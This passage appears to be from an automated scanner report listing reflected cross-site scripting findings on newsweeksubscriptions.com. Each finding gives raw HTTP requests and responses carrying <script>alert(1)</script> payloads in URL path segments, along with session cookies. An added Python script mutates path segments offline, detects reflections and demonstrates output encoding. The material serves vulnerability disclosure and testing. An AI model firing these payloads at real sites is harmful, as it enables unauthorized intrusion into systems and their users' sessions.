Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:12:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 807
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.comdcc53<script>alert(1)</script>663f9a33b8d is not found !</p>
...[SNIP]...

1.245. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5cf48<script>alert(1)</script>cbf6d265779 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol5cf48<script>alert(1)</script>cbf6d265779/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:14 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol5cf48<script>alert(1)</script>cbf6d265779/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af is not found !</p>
...[SNIP]...

1.246. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e8cbd<script>alert(1)</script>071e967c869 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.come8cbd<script>alert(1)</script>071e967c869/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:27 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.come8cbd<script>alert(1)</script>071e967c869/Netsparker0b594b604acd4cc2b9db63005bfbe9af is not found !</p>
...[SNIP]...

1.247. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9f5d0<script>alert(1)</script>4c2107201a6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af9f5d0<script>alert(1)</script>4c2107201a6/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com/Netsparker0b594b604acd4cc2b9db63005bfbe9af9f5d0<script>alert(1)</script>4c2107201a6 is not found !</p>
...[SNIP]...

1.248. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload efa22<script>alert(1)</script>d2dabff9a4c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolefa22<script>alert(1)</script>d2dabff9a4c/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:30 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolefa22<script>alert(1)</script>d2dabff9a4c/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5 is not found !</p>
...[SNIP]...

1.249. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e725c<script>alert(1)</script>5041d66dcbf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.come725c<script>alert(1)</script>5041d66dcbf/Netsparker589cd9fdeb73414b91501b3a353febd5/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:35 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.come725c<script>alert(1)</script>5041d66dcbf/Netsparker589cd9fdeb73414b91501b3a353febd5 is not found !</p>
...[SNIP]...

1.250. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5243f<script>alert(1)</script>5b2c7c01ebb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd55243f<script>alert(1)</script>5b2c7c01ebb/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:39 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd55243f<script>alert(1)</script>5b2c7c01ebb is not found !</p>
...[SNIP]...

1.251. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e85ef<script>alert(1)</script>16b36c3d219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrole85ef<script>alert(1)</script>16b36c3d219/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:50 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 598
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrole85ef<script>alert(1)</script>16b36c3d219/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575 is not found !</p>
...[SNIP]...

1.252. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 468b1<script>alert(1)</script>fbed0d930c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com468b1<script>alert(1)</script>fbed0d930c5/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:55 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/newsweek@emailcustomerservice.com468b1<script>alert(1)</script>fbed0d930c5/Netsparkerd186b3ae09c841c6bee1f9d4f0873575 is not found !</p>
...[SNIP]...

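Findings 1.248 through 1.253 share a single root cause: whichever path segment is mutated, the server copies the full request path verbatim into the "Campaign url ... is not found" paragraph, an HTML text context, without output encoding. The script below is an added example written for this report, not code from XSS.CX or from the newsweeksubscriptions.com application. It reproduces the report's per-segment mutation offline, classifies whether a response body reflects the marker-wrapped payload unencoded or HTML-encoded, and shows the output-encoding fix side by side with a constructed stand-in for the vulnerable response. The templates and the `render` callbacks are constructed for the demonstration; no request is sent.

```python
"""Per-segment reflected-XSS check and output-encoding fix (added example)."""
import html
import re
from urllib.parse import urlsplit

# Marker-wrapped payload in the style of the report: the alphanumeric
# prefix/suffix locate the reflection inside a large body. Constructed values
# chosen to match the request shown in finding 1.248.
PREFIX, SUFFIX = "efa22", "d2dabff9a4c"
INNER = "<script>alert(1)</script>"
PAYLOAD = f"{PREFIX}{INNER}{SUFFIX}"

# URL from the findings above.
BASE = ("https://www.newsweeksubscriptions.com/FTcontrol/"
        "newsweek@emailcustomerservice.com/Netsparker589cd9fdeb73414b91501b3a353febd5/")

# Constructed stand-in for the vulnerable response: the message paragraph as
# seen in the report, with the path interpolated and no encoding applied.
MESSAGE = ('<p style="font-family:arial;font-size:18px; color:#CB272C; '
           'font-weight:bold;"> Campaign url {path} is not found !</p>')


def inject_into_segment(path, index, payload):
    """Append payload to the index-th (1-based) non-empty path segment.

    This mirrors how the scanner mutated 'REST URL parameter N': the segment is
    extended, not replaced, and the surrounding slashes are preserved.
    """
    parts = path.split("/")
    nonempty = [i for i, p in enumerate(parts) if p]
    if not 1 <= index <= len(nonempty):
        raise IndexError("no such path segment")
    parts[nonempty[index - 1]] += payload
    return "/".join(parts)


def classify_reflection(body, prefix, suffix):
    """Classify what sits between the markers in the response body.

    'unencoded' means the script tag came back byte for byte (exploitable in an
    HTML text context); 'encoded' means < and > were entity-escaped; 'altered'
    covers filtering or truncation; 'absent' means no reflection at all.
    """
    m = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), body, re.S)
    if not m:
        return "absent"
    fragment = m.group(1)
    if fragment == INNER:
        return "unencoded"
    if fragment == html.escape(INNER):
        return "encoded"
    return "altered"


def vulnerable_render(path):
    """Constructed model of the observed behaviour: raw interpolation."""
    return MESSAGE.replace("{path}", path)


def hardened_render(path):
    """The fix: encode for the HTML text context before interpolation.

    html.escape covers &, <, >, " and '. This is sufficient for text between
    tags, which is the context the report identifies; attribute or JavaScript
    contexts would need context-specific encoding instead.
    """
    return MESSAGE.replace("{path}", html.escape(path))


def probe_all_segments(render, base=BASE):
    """Mutate every path segment in turn and classify each reflection.

    `render` stands in for the HTTP round trip so the check runs offline.
    Returns {segment_index: classification}.
    """
    path = urlsplit(base).path
    count = len([p for p in path.split("/") if p])
    return {i: classify_reflection(render(inject_into_segment(path, i, PAYLOAD)),
                                   PREFIX, SUFFIX)
            for i in range(1, count + 1)}


if __name__ == "__main__":
    print("observed :", probe_all_segments(vulnerable_render))
    print("hardened :", probe_all_segments(hardened_render))
```

When reproducing against a live host, note that the requests in the report send `<` and `>` raw in the path; a browser percent-encodes them as `%3C` and `%3E`, so confirm that the server decodes the path before reflecting it, otherwise the finding is reachable from a proxy but not from a victim's address bar.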
1.253. https://www.newsweeksubscriptions.com/FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f0873575/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b548<script>alert(1)</script>b47fa40c880 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrol/newsweek@emailcustomerservice.com/Netsparkerd186b3ae09c841c6bee1f9d4f08735755b548<script>alert(1)</script>b47fa40c880/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 850
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...